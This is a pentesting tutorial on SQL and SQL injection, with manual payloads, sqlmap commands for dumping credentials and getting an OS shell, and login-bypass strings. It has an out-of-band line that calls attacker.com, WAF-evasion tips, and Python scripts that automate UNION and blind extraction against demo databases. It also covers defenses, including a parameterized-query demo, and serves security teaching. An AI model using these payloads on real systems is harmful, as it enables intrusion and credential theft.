Understanding SQL (Structured Query Language) is non-negotiable for any serious pentester. Whether you’re hunting for SQL injection vulnerabilities or reviewing database misconfigurations, having a strong grasp of SQL will help you exploit weaknesses with precision — and understand what you’re breaking into.

This guide teaches you what SQL is, why it matters in pentesting, and all the key commands, queries, and injection tricks you need to know — with practical comments on what each line actually does.

  1. What Is SQL and Why It Matters
  2. Common Database Management Systems (DBMS)
  3. Key SQL Commands for Pentesters
  4. SQL Injection (SQLi) Overview
  5. Manual SQLi — Examples & Techniques
  6. Using SQLMap
  7. Bypassing Login Forms
  8. Extracting Data via SQLi
  9. Out-of-Band and Blind SQLi
  10. Tips for Enumeration & Fingerprinting
  11. Defenses You Should Know
  12. Labs to Practice

1. What Is SQL and Why It Matters

SQL is the language databases speak — it’s used to create, read, update, and delete data (CRUD operations).

As a pentester, SQL matters because:

  • Most web apps interact with a database.
  • Input fields may not sanitize user input.
  • SQL Injection is still a Top 10 OWASP vulnerability.

2. Common Database Management Systems (DBMS)

DBMS         Notes
MySQL        Popular in web apps (e.g., WordPress, Joomla)
MSSQL        Microsoft SQL Server, integrated with Windows authentication
PostgreSQL   Feature-rich, used in enterprise environments
Oracle       Seen in corporate and government networks
SQLite       Embedded in applications and mobile apps

Each uses its own SQL dialect (comment syntax, string concatenation, version functions, metadata tables), so learn to recognize them during an engagement: a payload written for MySQL will often fail outright against MSSQL or Oracle.

3. Key SQL Commands for Pentesters

SHOW DATABASES;
# List all databases on the server (MySQL)

USE target_database;
# Switch to a specific database (MySQL, MSSQL). PostgreSQL has no USE; in psql you reconnect with \c target_database instead

SHOW TABLES;
# List all tables in the selected database (MySQL)

SELECT table_name FROM information_schema.tables
WHERE table_schema = 'public';
# PostgreSQL: list all tables in the default 'public' schema

SELECT table_name FROM all_tables;
# Oracle: list all tables accessible to the current user (user_tables lists only the ones it owns)

DESCRIBE users;
# Show the structure of a table (columns, data types) in MySQL and Oracle

SELECT column_name
FROM information_schema.columns
WHERE table_name = 'users';
# Generic: find column names (works on MySQL, PostgreSQL and MSSQL; Oracle uses all_tab_columns instead)

SELECT * FROM users;
# Select all data from the 'users' table

SELECT username, password_hash FROM users;
# Retrieve specific fields (useful for credential dumps)

INSERT INTO users (username, password_hash, role)
VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99', 'admin');
# Insert a new admin user — classic privilege escalation (MD5 hash of 'password')

UPDATE users
SET role = 'admin'
WHERE username = 'jdoe';
# Update a user's role to admin

UPDATE users
SET password_hash = '098f6bcd4621d373cade4e832627b4f6'
WHERE username = 'guest';
# Change the password hash for a user (MD5 of 'test')

DELETE FROM users
WHERE username = 'victim';
# Delete a user account (destructive if misused)

INSERT INTO auth_tokens (user_id, token, expires_at)
VALUES (1, 'abcdef1234567890', NOW() + INTERVAL 1 DAY);
# Insert a fake session token (useful in token-based auth bypass)

INSERT INTO logs (user_id, action, timestamp)
VALUES (1, 'Accessed admin panel', NOW());
# Insert a forged audit log entry. Write access to the logs table lets an attacker plant or drown out entries, which is why audit logs should be shipped somewhere the application's DB user cannot write
SELECT * FROM users WHERE username = 'admin';
# Fetch user with the username 'admin'

SELECT * FROM users WHERE username LIKE '%min%';
# Search for usernames containing 'min'

SELECT COUNT(*) FROM users;
# Count the total number of users

SELECT AVG(age) FROM employees;
# Calculate the average age of employees

SELECT u.username, o.order_id
FROM users u
JOIN orders o ON u.id = o.user_id;
# Combine user info with their orders

SELECT name FROM sqlite_master WHERE type='table';
# List all tables in SQLite

4. SQL Injection (SQLi) Overview

SQLi occurs when untrusted input is concatenated into an SQL query instead of being passed as a bound parameter, so the attacker's text is parsed as SQL rather than treated as data:

http://site.com/page?id=1' OR '1'='1

SQLi Types:

  • Classic: Union-based and Error-based (results or error messages are visible in the response)
  • Blind: Boolean-based or Time-based (only a true/false difference or a timing signal comes back)
  • Out-of-Band (OOB): data leaves over a side channel such as DNS or HTTP

5. Manual SQLi — Examples & Techniques

?id=1' --
# Ends the query early to test for injection; an error or a changed page suggests the quote broke the query

' OR '1'='1' --
# Always-true condition; bypasses login when placed in the username field

admin' --
# Ends the query after the username field, commenting out the password check

?id=1' UNION SELECT null, version(), user()-- -
# Retrieve DB version and current user (MySQL). The UNION must return the same number of columns as the original query

?id=1' AND SLEEP(5)-- -
# A 5-second delay confirms injection via time-based testing (MySQL)

?id=1' UNION SELECT table_name, null
FROM information_schema.tables
WHERE table_schema=database()-- -
# Extract table names from the current DB (MySQL). '-- -' guarantees the whitespace MySQL requires after '--'

6. Using SQLMap

sqlmap -u "http://target.com/page.php?id=1" --dbs
# Enumerate databases

sqlmap -u "http://target.com/page.php?id=1" -D users --tables
# List tables in the 'users' database

sqlmap -u "http://target.com/page.php?id=1" -D users -T credentials --dump
# Dump the 'credentials' table

sqlmap -u "http://target.com/page.php?id=1" --os-shell
# Try to get an OS shell; needs a high-privileged DB user (e.g., FILE on MySQL, sysadmin on MSSQL) and, on MySQL, a writable web root

sqlmap -u "http://target.com/page.php?id=1" --passwords
# Dump DBMS user password hashes (sqlmap offers to crack them)

7. Bypassing Login Forms

Each payload goes in the username field. The goal is either to make the WHERE clause true for some row or to comment out the password comparison entirely. On MySQL, '--' needs trailing whitespace, so use '-- -' or '#' if the plain form fails.

' OR 1=1--
# Always true; returns the first matching user, often the admin

' OR '' = ''--
# Empty-string comparison bypass, same effect as above

admin'--
# Closes the username literal and comments out the password check

8. Extracting Data via SQLi

' ORDER BY 3-- -
# Find how many columns the original query returns: increase the number until the page errors

' UNION SELECT 1, username, password FROM users-- -
# Dump usernames and passwords into the page; the column count (3 here) must match the original query
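
The column-count and UNION steps above are usually done by hand, but the logic is mechanical. Here it is as an added Python example, not code from the original page, run against a constructed SQLite database: the tables, rows and the `vulnerable_lookup` function standing in for the target page are all assumptions. SQLite raises on an out-of-range ORDER BY just as MySQL errors, which is the signal the loop watches for.

```python
import sqlite3

# Constructed target; the tables and rows (including the MD5 hashes for
# 'password' and 'test' used elsewhere on this page) are assumptions.
def build_target() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
    conn.execute("INSERT INTO products VALUES (1, 'Widget', 9.99)")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
         (2, "jdoe", "098f6bcd4621d373cade4e832627b4f6")],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, id_param: str) -> list:
    """Models a product page whose ?id= value is dropped into a quoted string
    context. Returns the rows the page would render, or raises on a SQL error."""
    sql = "SELECT id, name, price FROM products WHERE id = '" + id_param + "'"
    return conn.execute(sql).fetchall()


def count_columns(conn: sqlite3.Connection, max_cols: int = 20) -> int:
    """ORDER BY n succeeds while n <= number of columns in the original SELECT
    and errors as soon as it exceeds it; the last n that worked is the count."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(conn, f"1' ORDER BY {n}-- -")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("could not determine column count")


def dump_users(conn: sqlite3.Connection) -> list:
    """Build a UNION SELECT of exactly the right width, padding with NULL, and
    use an id no product has so only the injected rows come back."""
    cols = count_columns(conn)
    if cols < 2:
        raise RuntimeError("need at least two columns to pull username and password")
    fields = ["username", "password"] + ["NULL"] * (cols - 2)
    payload = "0' UNION SELECT " + ", ".join(fields) + " FROM users-- -"
    rows = vulnerable_lookup(conn, payload)
    return sorted((row[0], row[1]) for row in rows)


if __name__ == "__main__":
    target = build_target()
    print("columns:", count_columns(target))
    for username, pw_hash in dump_users(target):
        print(username, pw_hash)
```

Against a real target, `vulnerable_lookup` would send the HTTP request and parse the rendered rows; everything else stays the same. If the original query's column types are strict (MSSQL, PostgreSQL), you may also need to swap `NULL` placeholders for values of matching type.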

9. Out-of-Band and Blind SQLi

?id=1 AND 1=1 --
# Should return the normal page

?id=1 AND 1=2 --
# Should return an error or a different page; a difference between the two responses means the parameter is injectable (boolean-based blind)

'; IF (1=1) WAITFOR DELAY '0:0:5'--
# MSSQL: 5-second delay confirms injection (time-based blind; relies on stacked queries, which MSSQL allows)

'; SELECT LOAD_FILE('\\\\attacker.com\\abc')--
# OOB (MySQL on Windows): the UNC path makes the DB server resolve attacker.com, so a DNS/SMB request reaches your box. Needs stacked queries and the FILE privilege; on MSSQL, xp_dirtree or xp_fileexist do the same job
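
Boolean-based blind injection gives you one bit per request, so in practice you script it. The following is an added Python example, not from the page: it simulates the vulnerable `?id=` endpoint with a function over a constructed in-memory SQLite database (schema, rows and the `admin` secret are made up), runs the AND 1=1 / AND 1=2 check from above, then recovers a value one character at a time with a binary search on its code point. Against a real target, `page_loads_normally` would issue the HTTP request and compare the response body or status.

```python
import sqlite3

# Constructed in-memory target; the schema, rows and the 'admin' secret are
# assumptions for this example, not data from the page.
def build_target() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO articles VALUES (1, 'Hello world')")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'Tr0ub4dor')")
    return conn


def page_loads_normally(conn: sqlite3.Connection, id_param: str) -> bool:
    """Models the vulnerable ?id= endpoint. The parameter is concatenated into a
    numeric context, and the only signal we get back is whether an article was
    rendered (True) or the page came back empty or errored (False)."""
    try:
        row = conn.execute(
            "SELECT title FROM articles WHERE id = " + id_param
        ).fetchone()
    except sqlite3.Error:
        return False
    return row is not None


def oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """One boolean-based blind probe: '1 AND (<condition>)' keeps the real
    row only when <condition> is true."""
    return page_loads_normally(conn, "1 AND (" + condition + ")")


def probe_injectable(conn: sqlite3.Connection) -> bool:
    """The AND 1=1 / AND 1=2 check from the cheat sheet: the parameter is
    injectable if the two probes produce different responses."""
    return oracle(conn, "1=1") and not oracle(conn, "1=2")


def extract_secret(conn: sqlite3.Connection, subquery: str, max_len: int = 64) -> str:
    """Recover the scalar result of `subquery` one character at a time. Each
    character is found by binary search over its code point, so it costs
    about 7 probes instead of up to 95 with a linear scan."""
    length = 0
    for n in range(1, max_len + 1):          # linear length probe
        if oracle(conn, f"(SELECT length(({subquery}))) = {n}"):
            length = n
            break
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126                      # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"(SELECT unicode(substr(({subquery}), {pos}, 1))) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


if __name__ == "__main__":
    target = build_target()
    print("injectable:", probe_injectable(target))
    print(extract_secret(target, "SELECT password FROM users WHERE username = 'admin'"))
```

The same loop works for time-based blind injection by replacing the page comparison in `oracle` with a response-time threshold (SLEEP on MySQL, WAITFOR DELAY on MSSQL), and for MySQL by swapping `unicode()`/`substr()` for `ASCII()`/`SUBSTRING()`.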

10. Tips for Enumeration & Fingerprinting

SELECT version();
# MySQL/PostgreSQL version

SELECT @@version;
# MSSQL version (MySQL accepts this form too)

SELECT banner FROM v$version;
# Oracle version info

?id=1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(version(), FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y)-- -
# MySQL error-based injection: the GROUP BY on a non-deterministic key forces a duplicate-key error whose message contains version(), leaking it even when query results are never displayed

11. Defenses You Should Know

  • Parameterized Queries (Prepared Statements): the real fix; query structure and data travel separately
  • Input Validation & Whitelisting: a second layer, not a substitute for parameterization
  • Stored Procedures, only if they don't build dynamic SQL internally (EXEC of a concatenated string is still injectable)
  • Web Application Firewalls (WAF): raise the bar, but signature filters can be bypassed
  • Least Privilege for DB users: the web app account needs no FILE privilege, xp_cmdshell or DBA rights

Because WAFs and blacklist filters are common, you'll also need filter-evasion skills:

  • Inline comments (e.g., /**/ in place of spaces)
  • URL encoding
  • Case manipulation (UnIoN SeLeCt)
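
To make the first defense concrete, here is an added Python example, not code from the original page, that runs the login-bypass payloads from section 7 against two versions of the same login check over a constructed SQLite table: one built by string concatenation, one using a parameterized query. The schema, rows and plaintext passwords are assumptions for the demo; a real application stores hashes.

```python
import sqlite3

# Constructed in-memory user table for the demo. Passwords are stored in
# plaintext only to keep the example short; the schema and rows are assumptions.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "S3cr3t!"), ("jdoe", "hunter2")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String concatenation: user input becomes part of the SQL grammar, so a
    quote in the username closes the literal and the rest is parsed as SQL."""
    sql = (
        "SELECT id FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterized query: the statement is compiled first and the values are
    bound afterwards, so a quote in the input is data, never a delimiter."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


# Login-bypass payloads from the cheat sheet, each placed in the username field.
PAYLOADS = ["' OR 1=1--", "' OR '' = ''--", "admin'--", "' OR '1'='1' --"]


def compare(conn: sqlite3.Connection) -> dict:
    """Returns {payload: (vulnerable_result, safe_result)}; the password is
    always wrong, so only the injection can make a login succeed."""
    return {p: (login_vulnerable(conn, p, "wrong"), login_safe(conn, p, "wrong"))
            for p in PAYLOADS}


if __name__ == "__main__":
    conn = build_db()
    for payload, (vuln, safe) in compare(conn).items():
        print(f"{payload!r:24} concatenated={vuln!s:5} parameterized={safe}")
```

Every payload logs in through `login_vulnerable` and is rejected by `login_safe`, while a legitimate `admin` / `S3cr3t!` login succeeds through both. Note that the safe version needs no escaping, blacklist or WAF: the parameter can contain any quote or comment sequence and the query shape never changes.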

12. Labs to Practice

  • TryHackMe: SQLi Fundamentals
  • PortSwigger Labs
  • HackTheBox Academy
  • DVWA/bWAPP on local VM

SQL is one of the most important tools in your offensive toolbox. It’s not just for exploiting websites — it’s for understanding them. Learn to read SQL like a language, and write it like a weapon.

“He who controls the query controls the data. He who controls the data controls the kingdom.”
